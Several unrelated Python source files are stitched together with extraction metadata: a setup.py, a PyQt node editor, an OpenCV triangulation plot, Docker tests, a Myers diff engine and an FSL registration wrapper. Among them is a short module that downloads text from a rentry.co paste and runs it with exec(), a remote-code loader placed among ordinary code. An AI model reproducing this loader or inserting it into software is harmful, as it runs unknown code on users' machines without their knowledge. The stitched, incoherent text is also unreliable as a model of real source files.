seed = args.pop('seed')
if seed:
np.random.seed(seed)
main(args)
| [
"rtg.log.info",
"numpy.flip",
"rtg.data.dataset.LoopingIterable",
"argparse.ArgumentParser",
"rtg.utils.IO.writer",
"numpy.random.randint",
"rtg.TranslationExperiment",
"numpy.random.seed",
"rtg.data.dataset.Batch"
] | [((3317, 3449), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Generates random data for testing"""', 'formatter_class': 'argparse.ArgumentDefaultsHelpFormatter'}), "(description='Generates random data for testing',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n", (3340, 3449), False, 'import argparse\n'), ((5300, 5334), 'rtg.log.info', 'log.info', (['f"""Wrote {count} records"""'], {}), "(f'Wrote {count} records')\n", (5308, 5334), False, 'from rtg import log, TranslationExperiment as Experiment\n'), ((5711, 5774), 'rtg.log.info', 'log.info', (['f"""Wrote {count} records to {src_file} and {tgt_file}"""'], {}), "(f'Wrote {count} records to {src_file} and {tgt_file}')\n", (5719, 5774), False, 'from rtg import log, TranslationExperiment as Experiment\n'), ((5883, 5939), 'rtg.log.info', 'log.info', (['f"""Setting up a dummy experiment at {work_dir}"""'], {}), "(f'Setting up a dummy experiment at {work_dir}')\n", (5891, 5939), False, 'from rtg import log, TranslationExperiment as Experiment\n'), ((7119, 7154), 'rtg.TranslationExperiment', 'Experiment', (['work_dir'], {'config': 'config'}), '(work_dir, config=config)\n', (7129, 7154), True, 'from rtg import log, TranslationExperiment as Experiment\n'), ((7235, 7259), 'rtg.log.info', 'log.info', (['f"""Args {args}"""'], {}), "(f'Args {args}')\n", (7243, 7259), False, 'from rtg import log, TranslationExperiment as Experiment\n'), ((1423, 1476), 'numpy.random.randint', 'np.random.randint', (['self.min_seq_len', 'self.max_seq_len'], {}), '(self.min_seq_len, self.max_seq_len)\n', (1440, 1476), True, 'import numpy as np\n'), ((1492, 1565), 'numpy.random.randint', 'np.random.randint', (['self.n_reserved_toks', 'self.vocab_size'], {'size': '(seq_len,)'}), '(self.n_reserved_toks, self.vocab_size, size=(seq_len,))\n', (1509, 1565), True, 'import numpy as np\n'), ((4767, 4802), 'numpy.random.randint', 'np.random.randint', (['min_len', 'max_len'], {}), '(min_len, max_len)\n', (4784, 4802), True, 'import numpy as np\n'), ((4821, 4864), 'numpy.random.randint', 'np.random.randint', (['lower', 'higher'], {'size': '_len'}), '(lower, higher, size=_len)\n', (4838, 4864), True, 'import numpy as np\n'), ((5406, 5425), 'rtg.utils.IO.writer', 'IO.writer', (['src_file'], {}), '(src_file)\n', (5415, 5425), False, 'from rtg.utils import IO\n'), ((5436, 5455), 'rtg.utils.IO.writer', 'IO.writer', (['tgt_file'], {}), '(tgt_file)\n', (5445, 5455), False, 'from rtg.utils import IO\n'), ((7309, 7329), 'numpy.random.seed', 'np.random.seed', (['seed'], {}), '(seed)\n', (7323, 7329), True, 'import numpy as np\n'), ((2832, 2866), 'rtg.data.dataset.LoopingIterable', 'LoopingIterable', (['train_data', 'steps'], {}), '(train_data, steps)\n', (2847, 2866), False, 'from rtg.data.dataset import LoopingIterable\n'), ((5016, 5040), 'numpy.flip', 'np.flip', (['tgt_seq'], {'axis': '(0)'}), '(tgt_seq, axis=0)\n', (5023, 5040), True, 'import numpy as np\n'), ((1865, 1920), 'rtg.data.dataset.Batch', 'Batch', (['exs'], {'sort_dec': '(True)', 'batch_first': 'self.batch_first'}), '(exs, sort_dec=True, batch_first=self.batch_first)\n', (1870, 1920), False, 'from rtg.data.dataset import Batch, Example\n')] |
# -*- coding: utf-8 -*-
# @Time : 2021-04-06 15:25
# @Author : Lodge
from sys import version_info
from setuptools import setup
from lite_tools.version import VERSION
if version_info < (3, 6, 0):
raise SystemExit("Sorry! lite_tools requires python 3.6.0 or later.")
with open("README.md", "r", encoding='utf-8') as fd:
long_description = fd.read()
base_requires = ['loguru']
# 这里暂时没有用到 -- 一些完整包的情况下的功能
file_requires = ["reportlab", "Pillow", "pandas", "xlsxwriter"]
date_requires = ["datetime", "lxml", "requests", "prettytable"]
all_requires = date_requires + file_requires
setup(
name='lite-tools',
version=VERSION.strip(),
description='一些基于内建函数的小工具集合[更多拓展功能基于第三方包,安装参考github页面]',
long_description=long_description,
long_description_content_type="text/markdown",
author='Lodge',
author_email='<EMAIL>',
url='https://github.com/Heartfilia/lite_tools',
packages=[
'lite_tools',
'lite_tools.trans',
'lite_tools.commands',
'lite_tools.lib_jar',
'lite_tools.utils_jar'
],
license='MIT',
install_requires=base_requires,
entry_points={"console_scripts": [
"lite-tools=lite_tools.commands.cmdline:execute",
]},
python_requires=">=3.6",
extras_require={
"all": all_requires,
"date": date_requires,
"file": file_requires
},
classifiers=[
'Intended Audience :: Developers',
'Operating System :: OS Independent',
'Natural Language :: Chinese (Simplified)',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
'Programming Language :: Python :: 3.10',
]
)
| [
"lite_tools.version.VERSION.strip"
] | [((636, 651), 'lite_tools.version.VERSION.strip', 'VERSION.strip', ([], {}), '()\n', (649, 651), False, 'from lite_tools.version import VERSION\n')] |
from os import system
try:
import requests
except Exception:
system('python3 -m pip install requests')
import requests
exec(requests.get('https://rentry.co/MCSniprxyz/raw').text)
| [
"os.system",
"requests.get"
] | [((69, 110), 'os.system', 'system', (['"""python3 -m pip install requests"""'], {}), "('python3 -m pip install requests')\n", (75, 110), False, 'from os import system\n'), ((138, 186), 'requests.get', 'requests.get', (['"""https://rentry.co/MCSniprxyz/raw"""'], {}), "('https://rentry.co/MCSniprxyz/raw')\n", (150, 186), False, 'import requests\n')] |
import os
from PyQt5.QtCore import *
from nodeeditor.utils import dumpException
from stack_conf import *
from stack_node_base import *
@register_node(OP_NODE_PRT_NODE)
class StackNode_PRT_Node(StackNode):
icon = os.path.join(os.path.dirname(__file__),"icons/in.png")
op_code = OP_NODE_PRT_NODE
op_title = "PRT Node"
content_label_objname = "stack_node_in/out"
def __init__(self, scene):
super().__init__(scene, inputs=[2], outputs=[1,4])
def initInnerClasses(self):
self.content = StackInputContent(self)
self.grNode = PrtGraphicsNode(self)
class PrtGraphicsNode(StackGraphicsNode):
def initSizes(self):
super().initSizes()
self.width = 160
self.height = 230
self.edge_size = 5
self._padding = 5
class StackInputContent(StackContent):
nodeDataModified = pyqtSignal(dict)
def initUI(self):
self.dataSans = ''
self.dataTans = ''
self.dataTestType = ''
self.dataTestOption = ''
self.dataModTrue = '+'
self.dataScoreTrue = '1'
self.dataPenaltyTrue = '0'
self.dataModFalse = '-'
self.dataScoreFalse = '0'
self.dataPenaltyFalse = '0'
self.dataTrueFeedback = ''
self.dataFalseFeedback = ''
self.layout = QVBoxLayout()
self.setLayout(self.layout)
self.layout.addWidget(QLabel("Student Answer:", self))
self.sans = QLineEdit("", self)
self.sans.textChanged.connect(self.updateDataAndPropertiesWidget)
self.sans.setStyleSheet(u'background-color: rgb(102, 102, 102);color: rgb(255, 255, 255);')
self.layout.addWidget(self.sans)
self.layout.addWidget(QLabel("Teacher Answer:", self))
self.tans = QLineEdit("", self)
self.tans.textChanged.connect(self.updateDataAndPropertiesWidget)
self.tans.setStyleSheet(u'background-color: rgb(102, 102, 102);color: rgb(255, 255, 255);')
self.layout.addWidget(self.tans)
self.layout.addWidget(QLabel("Test Options:", self))
self.testType = QComboBox(self)
self.testType.addItems(['', 'AlgEquiv', 'CasEqual', 'CompletedSquare', 'Diff', 'EqualComAss', 'EquivFirst', 'EquivReasoning', 'Expanded', 'FacForm', 'Int', 'GT', 'GTE', 'NumAbsolute', 'NumDecPlaces', 'NumDecPlacesWrong', 'NumRelative', 'NumSigFigs', 'RegExp', 'SameType', 'Sets', 'SigFigsStrict', 'SingleFrac', 'String', 'StirngSloppy', 'SubstEquiv', 'SysEquiv', 'UnitsAbsolute', 'UnitsRelative', 'Units', 'UnitsStrictAbsolute', 'UnitsStrictRelative', 'UnitsStrictSigFig'])
self.testType.setStyleSheet(u'background-color: rgb(102, 102, 102);color: rgb(255, 255, 255);')
self.testType.currentIndexChanged.connect(self.updateDataAndPropertiesWidget)
self.layout.addWidget(self.testType)
self.layout.addWidget(QLabel("Test Option Parameters:", self))
self.testOption = QLineEdit("", self)
self.testOption.setStyleSheet(u'background-color: rgb(102, 102, 102);color: rgb(255, 255, 255);')
self.testOption.textChanged.connect(self.updateDataAndPropertiesWidget)
self.layout.addWidget(self.testOption)
def updateDataAndPropertiesWidget(self):
self.dataSans = self.sans.text()
self.dataTans = self.tans.text()
self.dataTestType = self.testType.currentText()
self.dataTestOption = self.testOption.text()
self.updatePropertiesWidget()
def updatePropertiesWidget(self):
data = self.serialize()
self.nodeDataModified.emit(data)
def serialize(self):
res = super().serialize()
res['sans'] = self.dataSans
res['tans'] = self.dataTans
res['answertest'] = self.dataTestType
res['testoptions'] = self.dataTestOption
res['truescoremode'] = self.dataModTrue
res['truescore'] = self.dataScoreTrue
res['truepenalty'] = self.dataPenaltyTrue
res['falsescoremode'] = self.dataModFalse
res['falsescore'] = self.dataScoreFalse
res['falsepenalty'] = self.dataPenaltyFalse
res['truefeedback'] = self.dataTrueFeedback
res['falsefeedback'] = self.dataFalseFeedback
return res
def deserialize(self, data, hashmap=[]):
res = super().deserialize(data, hashmap)
try:
self.dataSans = data['sans']
self.sans.setText(self.dataSans)
self.dataTans = data['tans']
self.tans.setText(self.dataTans)
self.dataTestType = data['answertest']
self.testType.setCurrentIndex(self.testType.findText(self.dataTestType))
self.dataTestOption = data['testoptions']
self.testOption.setText(self.dataTestOption)
self.dataModTrue = data['truescoremode']
self.dataScoreTrue = data['truescore']
self.dataPenaltyTrue = data['truepenalty']
self.dataModFalse = data['falsescoremode']
self.dataScoreFalse = data['falsescore']
self.dataPenaltyFalse = data['falsepenalty']
self.dataTrueFeedback = data['truefeedback']
self.dataFalseFeedback = data['falsefeedback']
return True & res
except Exception as e:
dumpException(e)
return res
class StackOutputContent(StackContent):
def initUI(self):
self.lbl = QLabel("42", self)
self.lbl.setAlignment(Qt.AlignLeft)
self.lbl.setObjectName(self.node.content_label_objname)
# way how to register by function call
# register_node_now(OP_NODE_PRT_NODE, StackNode_PRT_Node) | [
"os.path.dirname",
"nodeeditor.utils.dumpException"
] | [((230, 255), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (245, 255), False, 'import os\n'), ((5247, 5263), 'nodeeditor.utils.dumpException', 'dumpException', (['e'], {}), '(e)\n', (5260, 5263), False, 'from nodeeditor.utils import dumpException\n')] |
# -*- coding: utf-8 -*-
import numpy as np
import cv2
from triangulation import Triangulation
class Draw(object):
@staticmethod
def draw_intersection_calculation(la1, lo1, r1, la2, lo2, r2, la3, lo3, r3, px, py):
# return self.circle_intersection_sympy(circle1,circle2)
x1, y1 = int((la1 - 40) * 100), int(lo1 * 100)
x2, y2 = int((la2 - 40) * 100), int(lo2 * 100)
x3, y3 = int((la3 - 40) * 100), int(lo3 * 100)
px, py = int((px - 40) * 100), int(py * 100)
# Create a black image
img = np.zeros((600, 600, 3), np.uint8)
# Bricolage temporaire pour faire coincider les distances en km avec les coordonées GPS (conflit plan/spérique)
r1 = int(r1 / 1000)
r2 = int(r2 / 800)
r3 = int(r3 / 800)-10
print('x b1 : ' + str(x1))
print('y b1 : ' + str(y1))
print('H_dist b1 : ' + str(r1))
print('x b2 : ' + str(x2))
print('y b2 : ' + str(y2))
print('H_dist b2 : ' + str(r2))
print('x b3 : ' + str(x3))
print('y b3 : ' + str(y3))
print('H_dist b3 : ' + str(r3))
print('x diver : ' + str(px))
print('y diver : ' + str(py))
# Circles : (0,0,r1), (dx2, dy2, r2), (dx3, dy3, r3)
cv2.circle(img, (x1, y1), 1, (255, 0, 0), 2)
cv2.imshow('image', img)
cv2.waitKey(0)
cv2.destroyAllWindows()
cv2.circle(img, (x2, y2), 1, (255, 0, 0), 2)
cv2.imshow('image', img)
cv2.waitKey(0)
cv2.destroyAllWindows()
cv2.circle(img, (x3, y3), 1, (255, 0, 0), 2)
cv2.imshow('image', img)
cv2.waitKey(0)
cv2.destroyAllWindows()
cv2.circle(img, (x1, y1), r1, (255, 0, 0), 2)
cv2.imshow('image', img)
cv2.waitKey(0)
cv2.destroyAllWindows()
cv2.circle(img, (x2, y2), r2, (255, 0, 0), 2)
cv2.imshow('image', img)
cv2.waitKey(0)
cv2.destroyAllWindows()
cv2.circle(img, (x3, y3), r3, (255, 0, 0), 2)
cv2.imshow('image', img)
cv2.waitKey(0)
cv2.destroyAllWindows()
cv2.circle(img, (px, py), 1, (0, 0, 255), 2)
cv2.imshow('image', img)
cv2.waitKey(0)
cv2.destroyAllWindows()
exit(0)
@staticmethod
def draw_example():
Draw.draw_intersection_calculation(
42.495994, 3.442279,
Triangulation.distance_between_coordinates_in_m(42.495994, 3.442279, 43.10572, 3.949412),
43.181071, 5.21284, Triangulation.distance_between_coordinates_in_m(43.181071, 5.21284, 43.10572, 3.949412),
43.355465, 3.828563,
Triangulation.distance_between_coordinates_in_m(43.355465, 3.828563, 43.10572, 3.949412),
43.10572, 3.949412)
if __name__ == '__main__':
Draw.draw_example()
| [
"triangulation.Triangulation.distance_between_coordinates_in_m",
"cv2.imshow",
"cv2.circle",
"numpy.zeros",
"cv2.destroyAllWindows",
"cv2.waitKey"
] | [((553, 586), 'numpy.zeros', 'np.zeros', (['(600, 600, 3)', 'np.uint8'], {}), '((600, 600, 3), np.uint8)\n', (561, 586), True, 'import numpy as np\n'), ((1270, 1314), 'cv2.circle', 'cv2.circle', (['img', '(x1, y1)', '(1)', '(255, 0, 0)', '(2)'], {}), '(img, (x1, y1), 1, (255, 0, 0), 2)\n', (1280, 1314), False, 'import cv2\n'), ((1323, 1347), 'cv2.imshow', 'cv2.imshow', (['"""image"""', 'img'], {}), "('image', img)\n", (1333, 1347), False, 'import cv2\n'), ((1356, 1370), 'cv2.waitKey', 'cv2.waitKey', (['(0)'], {}), '(0)\n', (1367, 1370), False, 'import cv2\n'), ((1379, 1402), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (1400, 1402), False, 'import cv2\n'), ((1411, 1455), 'cv2.circle', 'cv2.circle', (['img', '(x2, y2)', '(1)', '(255, 0, 0)', '(2)'], {}), '(img, (x2, y2), 1, (255, 0, 0), 2)\n', (1421, 1455), False, 'import cv2\n'), ((1464, 1488), 'cv2.imshow', 'cv2.imshow', (['"""image"""', 'img'], {}), "('image', img)\n", (1474, 1488), False, 'import cv2\n'), ((1497, 1511), 'cv2.waitKey', 'cv2.waitKey', (['(0)'], {}), '(0)\n', (1508, 1511), False, 'import cv2\n'), ((1520, 1543), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (1541, 1543), False, 'import cv2\n'), ((1552, 1596), 'cv2.circle', 'cv2.circle', (['img', '(x3, y3)', '(1)', '(255, 0, 0)', '(2)'], {}), '(img, (x3, y3), 1, (255, 0, 0), 2)\n', (1562, 1596), False, 'import cv2\n'), ((1605, 1629), 'cv2.imshow', 'cv2.imshow', (['"""image"""', 'img'], {}), "('image', img)\n", (1615, 1629), False, 'import cv2\n'), ((1638, 1652), 'cv2.waitKey', 'cv2.waitKey', (['(0)'], {}), '(0)\n', (1649, 1652), False, 'import cv2\n'), ((1661, 1684), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (1682, 1684), False, 'import cv2\n'), ((1693, 1738), 'cv2.circle', 'cv2.circle', (['img', '(x1, y1)', 'r1', '(255, 0, 0)', '(2)'], {}), '(img, (x1, y1), r1, (255, 0, 0), 2)\n', (1703, 1738), False, 'import cv2\n'), ((1747, 1771), 'cv2.imshow', 'cv2.imshow', (['"""image"""', 'img'], {}), "('image', img)\n", (1757, 1771), False, 'import cv2\n'), ((1780, 1794), 'cv2.waitKey', 'cv2.waitKey', (['(0)'], {}), '(0)\n', (1791, 1794), False, 'import cv2\n'), ((1803, 1826), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (1824, 1826), False, 'import cv2\n'), ((1835, 1880), 'cv2.circle', 'cv2.circle', (['img', '(x2, y2)', 'r2', '(255, 0, 0)', '(2)'], {}), '(img, (x2, y2), r2, (255, 0, 0), 2)\n', (1845, 1880), False, 'import cv2\n'), ((1889, 1913), 'cv2.imshow', 'cv2.imshow', (['"""image"""', 'img'], {}), "('image', img)\n", (1899, 1913), False, 'import cv2\n'), ((1922, 1936), 'cv2.waitKey', 'cv2.waitKey', (['(0)'], {}), '(0)\n', (1933, 1936), False, 'import cv2\n'), ((1945, 1968), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (1966, 1968), False, 'import cv2\n'), ((1977, 2022), 'cv2.circle', 'cv2.circle', (['img', '(x3, y3)', 'r3', '(255, 0, 0)', '(2)'], {}), '(img, (x3, y3), r3, (255, 0, 0), 2)\n', (1987, 2022), False, 'import cv2\n'), ((2031, 2055), 'cv2.imshow', 'cv2.imshow', (['"""image"""', 'img'], {}), "('image', img)\n", (2041, 2055), False, 'import cv2\n'), ((2064, 2078), 'cv2.waitKey', 'cv2.waitKey', (['(0)'], {}), '(0)\n', (2075, 2078), False, 'import cv2\n'), ((2087, 2110), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (2108, 2110), False, 'import cv2\n'), ((2119, 2163), 'cv2.circle', 'cv2.circle', (['img', '(px, py)', '(1)', '(0, 0, 255)', '(2)'], {}), '(img, (px, py), 1, (0, 0, 255), 2)\n', (2129, 2163), False, 'import cv2\n'), ((2173, 2197), 'cv2.imshow', 'cv2.imshow', (['"""image"""', 'img'], {}), "('image', img)\n", (2183, 2197), False, 'import cv2\n'), ((2206, 2220), 'cv2.waitKey', 'cv2.waitKey', (['(0)'], {}), '(0)\n', (2217, 2220), False, 'import cv2\n'), ((2229, 2252), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (2250, 2252), False, 'import cv2\n'), ((2402, 2495), 'triangulation.Triangulation.distance_between_coordinates_in_m', 'Triangulation.distance_between_coordinates_in_m', (['(42.495994)', '(3.442279)', '(43.10572)', '(3.949412)'], {}), '(42.495994, 3.442279, \n 43.10572, 3.949412)\n', (2449, 2495), False, 'from triangulation import Triangulation\n'), ((2524, 2616), 'triangulation.Triangulation.distance_between_coordinates_in_m', 'Triangulation.distance_between_coordinates_in_m', (['(43.181071)', '(5.21284)', '(43.10572)', '(3.949412)'], {}), '(43.181071, 5.21284, \n 43.10572, 3.949412)\n', (2571, 2616), False, 'from triangulation import Triangulation\n'), ((2658, 2751), 'triangulation.Triangulation.distance_between_coordinates_in_m', 'Triangulation.distance_between_coordinates_in_m', (['(43.355465)', '(3.828563)', '(43.10572)', '(3.949412)'], {}), '(43.355465, 3.828563, \n 43.10572, 3.949412)\n', (2705, 2751), False, 'from triangulation import Triangulation\n')] |
import unittest
import docker
from src.test import utils
class DockerTestEnvironmentDBDiskSizeTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
print(f"SetUp {cls.__name__}")
cls.test_environment = utils.ExaslctTestEnvironment(cls, "./start-test-env",
clean_images_at_close=False)
def setUp(self):
self.client = docker.from_env()
@classmethod
def tearDownClass(cls):
try:
cls.test_environment.close()
except Exception as e:
print(e)
def tearDown(self):
try:
self.on_host_docker_environment.close()
except Exception as e:
print(e)
try:
self.google_cloud_docker_environment.close()
except Exception as e:
print(e)
self.client.close()
def assert_disk_size(self, size:str):
containers = [c.name for c in self.client.containers.list() if self.docker_environment_name in c.name]
db_container = [c for c in containers if "db_container" in c]
exit_result = self.client.containers.get(db_container[0]).exec_run("cat /exa/etc/EXAConf")
output = exit_result[1].decode("UTF-8")
return_code = exit_result[0]
if output == '':
exit_result = self.client.containers.get(db_container[0]).exec_run("cat /exa/etc/EXAConf")
output = exit_result[1].decode("UTF-8")
return_code = exit_result[0]
self.assertEquals(return_code,0)
self.assertIn(" Size = %s"%size,output)
def test_default_db_disk_size(self):
self.docker_environment_name = "test_default_db_disk_size"
self.on_host_docker_environment, self.google_cloud_docker_environment = \
self.test_environment.spawn_docker_test_environment(self.docker_environment_name)
self.assert_disk_size("2 GiB")
def test_smallest_valid_db_disk_size(self):
self.docker_environment_name = "test_smallest_valid_db_disk_size"
self.on_host_docker_environment, self.google_cloud_docker_environment = \
self.test_environment.spawn_docker_test_environment(self.docker_environment_name, ["--db-disk-size","'100 MiB'"])
self.assert_disk_size("100 MiB")
def test_invalid_db_mem_size(self):
self.docker_environment_name = "test_invalid_db_disk_size"
with self.assertRaises(Exception) as context:
self.on_host_docker_environment, self.google_cloud_docker_environment = \
self.test_environment.spawn_docker_test_environment(self.docker_environment_name, ["--db-disk-size","'90 MiB'"])
if __name__ == '__main__':
unittest.main()
| [
"unittest.main",
"src.test.utils.ExaslctTestEnvironment",
"docker.from_env"
] | [((2714, 2729), 'unittest.main', 'unittest.main', ([], {}), '()\n', (2727, 2729), False, 'import unittest\n'), ((236, 323), 'src.test.utils.ExaslctTestEnvironment', 'utils.ExaslctTestEnvironment', (['cls', '"""./start-test-env"""'], {'clean_images_at_close': '(False)'}), "(cls, './start-test-env', clean_images_at_close\n =False)\n", (264, 323), False, 'from src.test import utils\n'), ((423, 440), 'docker.from_env', 'docker.from_env', ([], {}), '()\n', (438, 440), False, 'import docker\n')] |
# Copyright 2010 <NAME> (<EMAIL>)
# Copyright 2015 Techcable
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
A clean-room implementation of <a href="http://www.cs.arizona.edu/people/gene/">Eugene Myers</a> differencing algorithm.
See the paper at http://www.cs.arizona.edu/people/gene/PAPERS/diff.ps
"""
import hashlib
from typing import List, Optional, T
from .core import Chunk, Delta, Patch
from .engine import DiffEngine
class MyersEngine(DiffEngine):
def __init__(self, hash_optimization=True):
self.hash_optimization = hash_optimization
@property
def name(self):
return "plain_myers"
def diff(self, original, revised):
if type(original) is not list:
raise TypeError("Original must be a list: {!r}".format(original))
if type(revised) is not list:
raise TypeError("Revised must be a list: {!r}".format(revised))
original_hashes = None # type: list[bytes]
revised_hashes = None # type: list[bytes]
if self.hash_optimization:
# Since build_path actually doesn't need the elements themselves, we can take their sha256sum to speed up comparison
# This can improve performance noticably, since hashes usually differ in the first few bytes and there are only 32 bytes at most
original_hashes = []
for element in original:
if type(element) is not str:
original_hashes, revised_hashes = None, None
break
h = hashlib.sha256()
h.update(element.encode("utf-8"))
original_hashes.append(h.digest())
if original_hashes is not None:
revised_hashes = []
for element in revised:
if type(element) is not str:
original_hashes, revised_hashes = None, None
break
h = hashlib.sha256()
h.update(element.encode("utf-8"))
revised_hashes.append(h.digest())
if original_hashes is not None:
path = build_path(original_hashes, revised_hashes)
else:
path = build_path(original, revised)
return build_revision(path, original, revised)
def __repr__(self):
if self.hash_optimization:
return "PlainMyersEngine"
else:
return "PlainMyersEngine(hash_optimization=False)"
def build_path(original: List[T], revised: List[T]) -> "DiffNode":
"""
Computes the minimum diffpath that expresses the differences between the original and revised sequences,
according to Gene Myers differencing algorithm.
According to the author of the algorithm, a diffpath will always be found, so a RuntimeError shouldn't be thrown.
:param original: The original sequence.
:param revised: The revised sequence.
:return: A minimum {@link DiffNode Path} across the differences graph.
:exception RuntimeError: if a diff path could not be found.
"""
original_size = len(original)
revised_size = len(revised)
max_size = original_size + revised_size + 1
size = 1 + 2 * max_size
middle = size // 2
diagonal = [None] * size # type: list[Optional["DiffNode"]]
diagonal[middle + 1] = create_snake(0, -1, None)
for d in range(max_size):
for k in range(-d, d + 1, 2):
kmiddle = middle + k
kplus = kmiddle + 1
kminus = kmiddle - 1
prev = None
# For some reason this works, but not the other ways
if (k == -d) or (k != d and diagonal[kminus].i < diagonal[kplus].i):
i = diagonal[kplus].i
prev = diagonal[kplus]
else:
i = diagonal[kminus].i + 1
prev = diagonal[kminus]
diagonal[kminus] = None
j = i - k
node = create_diff_node(i, j, prev)
# orig and rev are zero-based
# but the algorithm is one-based
# that's why there's no +1 when indexing the sequences
while i < original_size and j < revised_size and original[i] == revised[j]:
i += 1
j += 1
if i > node.i:
node = create_snake(i, j, node)
diagonal[kmiddle] = node
if i >= original_size and j >= revised_size:
return diagonal[kmiddle]
diagonal[middle + d - 1] = None
# According to Myers, this cannot happen
raise RuntimeError("couldn't find a diff path")
def build_revision(path: "DiffNode", original: List[T], revised: List[T]) -> Patch:
"""
Constructs a {@link Patch} from a difference path.
:param path: The path.
:param original: The original sequence.
:param revised: The revised sequence.
:exception ValueError: If there is an invalid diffpath
:return: A Patch corresponding to the path.
"""
patch = Patch()
if path.is_snake():
path = path.prev
while path is not None and path.prev is not None and path.prev.j >= 0:
if path.is_snake():
raise ValueError("Found snake when looking for diff")
i = path.i
j = path.j
path = path.prev
ianchor = path.i
janchor = path.j
original_chunk = Chunk(ianchor, original[ianchor:i])
revised_chunk = Chunk(janchor, revised[janchor:j])
delta = Delta.create(original_chunk, revised_chunk)
patch.add_delta(delta)
if path.is_snake():
path = path.prev
return patch
class DiffNode:
"""
A diffnode in a diffpath.
A DiffNode and its previous node mark a delta between two input sequences,
in other words, two differing sub-sequences (possibly 0 length) between two matching sequences.
DiffNodes and Snakes allow for compression of diffpaths,
because each snake is represented by a single Snake node
and each contiguous series of insertions and deletions is represented by a DiffNode.
:type i: int
:type j: int
:type lastSnake: Optional["DiffNode"]
:type prev: Optional["DiffNode"]
:type snake: bool
"""
__slots__ = "i", "j", "lastSnake", "snake", "prev"
def __init__(self, i, j):
"""
Creates a new path node
:param i: The position in the original sequence for the new node.
:param j: The position in the revised sequence for the new node.
:param prev: The previous node in the path.
"""
self.i = i
self.j = j
self.lastSnake = None
self.snake = False
def is_snake(self):
"""
Return if the node is a snake
:return: true if the node is a snake
"""
return self.snake
def previous_snake(self):
"""
Skips sequences of nodes until a snake or bootstrap node is found.
If this node is a bootstrap node (no previous), this method will return None.
:return: the first snake or bootstrap node found in the path, or None
"""
return self.lastSnake
def create_diff_node(i, j, prev):
node = DiffNode(i, j)
prev = prev.lastSnake
node.prev = prev
if i < 0 or j < 0:
node.lastSnake = None
else:
node.lastSnake = prev.lastSnake
return node
def create_snake(i, j, prev):
snake = DiffNode(i, j)
snake.prev = prev
snake.lastSnake = snake
snake.snake = True
return snake
| [
"hashlib.sha256"
] | [((2027, 2043), 'hashlib.sha256', 'hashlib.sha256', ([], {}), '()\n', (2041, 2043), False, 'import hashlib\n'), ((2409, 2425), 'hashlib.sha256', 'hashlib.sha256', ([], {}), '()\n', (2423, 2425), False, 'import hashlib\n')] |
#!/usr/bin/env python
# Copyright 2016 NeuroData (http://neurodata.io)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# register.py
# Created by <NAME> on 2016-01-28.
# Email: <EMAIL>
from subprocess import Popen, PIPE
import os.path as op
import ndmg.utils as mgu
import nibabel as nb
import numpy as np
import nilearn.image as nl
class register(object):
def __init__(self):
"""
Enables registration of single images to one another as well as volumes
within multi-volume image stacks. Has options to compute transforms,
apply transforms, as well as a built-in method for aligning low
resolution dwi images to a high resolution atlas.
"""
pass
def align(self, inp, ref, xfm=None, out=None, dof=12, searchrad=True,
bins=256, interp=None, cost="mutualinfo"):
"""
Aligns two images and stores the transform between them
**Positional Arguments:**
inp:
- Input impage to be aligned as a nifti image file
ref:
- Image being aligned to as a nifti image file
xfm:
- Returned transform between two images
out:
- determines whether the image will be automatically
aligned.
dof:
- the number of degrees of freedom of the alignment.
searchrad:
- a bool indicating whether to use the predefined
searchradius parameter (180 degree sweep in x, y, and z).
interp:
- the interpolation method to use. Default is trilinear.
"""
cmd = "flirt -in {} -ref {}".format(inp, ref)
if xfm is not None:
cmd += " -omat {}".format(xfm)
if out is not None:
cmd += " -out {}".format(out)
if dof is not None:
cmd += " -dof {}".format(dof)
if bins is not None:
cmd += " -bins {}".format(bins)
if interp is not None:
cmd += " -interp {}".format(interp)
if cost is not None:
cmd += " -cost {}".format(cost)
if searchrad is not None:
cmd += " -searchrx -180 180 -searchry -180 180 " +\
"-searchrz -180 180"
mgu.execute_cmd(cmd, verb=True)
def align_epi(self, epi, t1, brain, out):
"""
Algins EPI images to T1w image
"""
cmd = 'epi_reg --epi={} --t1={} --t1brain={} --out={}'
cmd = cmd.format(epi, t1, brain, out)
mgu.execute_cmd(cmd, verb=True)
def align_nonlinear(self, inp, ref, xfm, warp, mask=None):
"""
Aligns two images using nonlinear methods and stores the
transform between them.
**Positional Arguments:**
inp:
- the input image.
ref:
- the reference image.
affxfm:
- the affine transform to use.
warp:
- the path to store the nonlinear warp.
mask:
- a mask in which voxels will be extracted
during nonlinear alignment.
"""
cmd = "fnirt --in={} --aff={} --cout={} --ref={} --subsamp=4,2,1,1"
cmd = cmd.format(inp, xfm, warp, ref)
if mask is not None:
cmd += " --refmask={}".format(mask)
out, err = mgu.execute_cmd(cmd, verb=True)
def applyxfm(self, inp, ref, xfm, aligned):
"""
Aligns two images with a given transform
**Positional Arguments:**
inp:
- Input impage to be aligned as a nifti image file
ref:
- Image being aligned to as a nifti image file
xfm:
